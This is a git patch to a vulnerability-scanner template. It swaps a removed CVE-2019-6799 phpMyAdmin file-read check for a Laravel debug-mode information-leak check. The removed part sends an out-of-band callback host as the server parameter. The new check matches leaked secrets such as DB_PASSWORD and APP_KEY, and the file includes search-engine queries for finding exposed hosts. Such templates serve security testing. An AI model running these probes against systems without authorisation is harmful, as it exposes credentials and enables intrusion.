From 877876d67ec16f710d22d46d34275fe741899c98 Mon Sep 17 00:00:00 2001 From: QAQ <104293903+pwnhxl@users.noreply.github.com> Date: Tue, 14 Mar 2023 21:42:06 +0800 Subject: [PATCH] Update laravel-debug-infoleak.yaml --- .../laravel/laravel-debug-infoleak.yaml | 87 +++++-------------- 1 file changed, 21 insertions(+), 66 deletions(-) diff --git a/vulnerabilities/laravel/laravel-debug-infoleak.yaml b/vulnerabilities/laravel/laravel-debug-infoleak.yaml index 49aaa8f2b1..466b624855 100644 --- a/vulnerabilities/laravel/laravel-debug-infoleak.yaml +++ b/vulnerabilities/laravel/laravel-debug-infoleak.yaml @@ -1,89 +1,44 @@ -id: CVE-2019-6799 +id: laravel-debug-infoleak info: - name: CVE-2019-6799 + name: Laravel-Debug-Infoleak author: pwnhxl severity: high - description: An issue was discovered in phpMyAdmin before 4.8.5. When the AllowArbitraryServer configuration setting is set to true, with the use of a rogue MySQL server, an attacker can read any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of "options(MYSQLI_OPT_LOCAL_INFILE" calls. + description: Laravel-Debug-Infoleak reference: - - https://paper.seebug.org/1112/#_4 - - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799 - - https://nvd.nist.gov/vuln/detail/CVE-2019-6799 - - https://github.com/rmb122/rogue_mysql_server - - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver + - https://nosec.org/home/detail/3059.html metadata: verified: "true" - shodan-query: title:"phpmyadmin" - hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - fofa-query: body="pma_servername" && body="4.8.4" - tags: phpmyadmin,mysql,fileread + fofa-query: app="Laravel-Framework" + tags: laravel,debug,infoleak requests: - raw: - | - GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1 + POST / HTTP/1.1 Host: {{Hostname}} - payloads: - path: - - "/index.php" - - "/pma/index.php" - - "/pmd/index.php" - - "/phpMyAdmin/index.php" - - "/phpmyadmin/index.php" - - "/_phpmyadmin/index.php" - attack: batteringram - - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - '\?v=([0-9.]+)' - - - type: regex - group: 1 - regex: - - '\?v=([0-9.]+)' - - - type: regex - name: phpversion - part: header - internal: true - group: 1 - regex: - - "X-Powered-By: PHP/([0-9.]+)" - - stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol + part: body words: - - "dns" + - 'vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php' + - 'MethodNotAllowedHttpException' + condition: and - type: word + part: body words: - - "mysqli_real_connect" - - - type: word - words: - - "pma_servername" - - - type: dsl - dsl: - - compare_versions(version, '< 4.8.5') - - - type: dsl - dsl: - - compare_versions(version, '> 3.9.9') - - - type: dsl - dsl: - - compare_versions(phpversion, '< 7.3.4') + - 'DB_PASSWORD' + - 'REDIS_PASSWORD' + - 'MAIL_PASSWORD' + - 'ALIYUN_ACCESSKEYSECRET' + - 'ALIYUN_ACCESSKEYID' + - 'SMS_AUTH_TOKEN' + - 'APP_KEY' + condition: or - type: status status: - - 200 + - 405